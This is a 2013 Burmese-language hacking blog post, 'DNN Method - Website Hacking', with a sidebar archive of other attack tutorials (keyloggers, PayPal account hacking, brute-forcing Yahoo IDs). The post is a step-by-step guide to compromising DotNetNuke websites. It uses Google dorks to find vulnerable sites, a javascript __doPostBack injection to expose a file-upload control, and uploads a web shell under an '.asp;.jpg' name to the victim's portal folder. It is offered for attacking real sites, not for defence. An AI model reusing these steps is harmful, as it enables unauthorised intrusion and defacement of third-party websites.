Step 1 : www.google.com ကို သြားလိုက္ပါ။
Step 2 : ေအာက္မွာ ေပးထားတဲ ့dork ၂ ခု ထဲ က တစ္ခုခု ကို google search မွာ copy/paste လုပ္ပီး ရွာလိုက္ပါ။ ( က်ေနာ့္အေနနဲ ့ကေတာ့ ဒုတိယ တစ္ခုကို ပိုျပီး အသံုးျပဳပါလို ့အၾကံေပးခ်င္ပါတယ္ )
:inurl:/tabid/36/language/en-US/Default.aspx
:inurl:/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
Step 3 : Vulnerable sites ေတြ ကို ေတြ ့ရပါလိမ့္မယ္ အဆင္ေျပရာ ႏွစ္သက္ရာ တစ္ဆိုဒ္ ကို ေရြးလိုက္ပါ
Step 4 : တကယ္လို ့ သင္ဟာ Step 2 : မွာတုန္းက ပထမ dork ကိုသာ ေရြးျခယ္ခဲ့မယ္ဆိုရင္ ေတာ့
/Home/tabid/36/Language/en-US/Default.aspx
အစား
ကိုအစားထိုးလိုက္ပါ။/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
Note***
အထက္ပါ ပံုအတိုင္း Link Gallery Page ေပၚလာရင္ေတာ့
ေနာက္အဆင့္ေတြ ဆက္လုပ္လို ့ရပါတယ္
ေနာက္အဆင့္ေတြ ဆက္လုပ္လို ့ရပါတယ္
တကယ္လို ့ ေအာက္က ပံုအတိုင္းေပၚလာရင္ေတာ့ အဲ့ဒီ site ကို hack လို ့မရႏုိင္ပါဘူး
တျခား site တစ္ခုကို ေျပာင္းျပီး ေရြးခ်ယ္ရမွာျဖစ္ပါတယ္။
Step 5 : တကယ္လို ့အဆင္ေျပေျပနဲ ့ Link Gallery Page ေပၚလာတယ္ဆိုရင္ေတာ့ address bar URL မွာ ေအာက္ကေပးထားတဲ ့Script ေလး ထည့္ေပးလုိက္ပါ။
Step 6 : ဒါဆိုရင္ေတာ့ file upload လုပ္ဖို ့အတြက္ option တစ္ခု ေပၚလာပါလိမ့္မယ္javascript:__doPostBack('ctlURL$cmdUpload','')
Step 7 : Root ဆိုတာကို ေရြးလိုက္ပါ။
Step 8 : ျပီးရင္ေတာ့ မိမိ shell ကို upload လုပ္လိုက္လို ့ရပါျပီ။
*** upload လုပ္ထားတဲ့ shell ကို ျပန္ရွာခ်င္ရင္ေတာ့
www.victimsite.com/portals/0/yourshellname.asp;.jpg
အဲ့ဒီ format အတိုင္းျပန္ရွာႏုိင္ပါတယ္ victimsite.com ေနရာမွာ မိမိ ေရြးခ်ယ္ထားတဲ ့target site နဲ ့
yourshellname ေနရာမွာ ေတာ့ မိမိ တင္လိုက္တဲ ့shell နာမည္ကို ထည့္ရမွာျဖစ္ပါတယ္။
Wednesday, June 12, 2013
//
Labels:
Hacking Tutorial
//
0
comments
//
0 comments to "DNN Method - Website Hacking"
Powered by Blogger.
Respect List
Blink Hacker Group
Myanmar Hacker Uniteam
Brotherhood of Myanmar Hackers
and All Myanmar Attackers & All Myanmar Black Hats.
Myanmar Hacker Uniteam
Brotherhood of Myanmar Hackers
and All Myanmar Attackers & All Myanmar Black Hats.
Categories
@Lph@ blog ကို Android Devices ေတြေပၚကဖတ္ခ်င္ရင္
Link list 1
- Application (1)
- E-book (2)
- Facebook Tips & Tricks (2)
- Hacking Tutorial (37)
- HTML (2)
- Kali Linux (6)
- Mobile Tips & Tricks (5)
- Myanmar Cyber Army (1)
Popular Posts
-
Local File Inclusion Vulnerability ကို အသံုးခ်ျပီး Shell upload လုပ္ဖို ့အတြက္ common parameter အခ်ိဳ ့ကို သိထားဖို ့လိုအပ္ပါတယ္။ index.p...
-
Kali Linux အသံုးျပဳသူေတြ အတြက္ အသံုး၀င္မယ့္ Tools ေတြရဲ ့ Descriptions ေတြရယ္ အသံုးျပဳပံုေတြ ပါ၀င္ပါတယ္။ Kali Linux ကို အသံုးျပဳေနတယ္ဆိုရ...
Followers
စည္းလုံးျခင္းသံစဥ္ေရဒီယုိ
Blog Archive
-
▼
2013
(56)
-
▼
June
(26)
- Android Bot Maker
- How to get someone IP Address
- Linux Sever တစ္ခုကို ဘယ္လို Root လုပ္မလဲ
- USB drive အသံုးျပဳျပီး Password မ်ားခိုးယူျခင္း
- Rooting A Server
- Inserting Keylogger Code in Android SwiftKey Using...
- Android Keylogger
- Firewall ကို Back Door / Trojan Virus ႏွင့္ ခ်ိဳးေ...
- Basic Spreading Method
- WordPress ရဲ ့ Zer0 Day Exploit
- Website Admin Panel ကို အလြယ္ကူဆံုး hack နည္း
- Hacking Paypal Accounts
- Hacking Joomla Sites
- DNN Method - Website Hacking
- Protect your Facebook account from hackers with My...
- Hack Wordpress Blogs
- Hack Unsecured Webcams
- How to secure your server from PHP Shells!
- HTML ဆုိတာဘာလဲ ?
- HTML မိတ္ဆက္
- IIS Exploit - Easiest way to deface Website [Windo...
- Hack YAHOO IDs by Brute Force Attack
- SMS Spoffer
- Hack / Bypass .asp sites using SQL Injection
- Hacking 800 Collection
- Blog ရဲ ့ရည္ရြယ္ခ်က္
-
▼
June
(26)
Post a Comment
သင့္ရဲ ့ comment မ်ားက ကြ်န္ေတာ္တို႔လို blogger ေတြ အတြက္ အားေဆးတစ္ခြက္ပါ။
ေကာင္းသည္၊ ဆုိးသည္ ေရးႏုိင္ပါသည္။ လိုအပ္သည္မ်ားကိုလည္းေဝဖန္အၾကံေပးႏုိင္ပါသည္။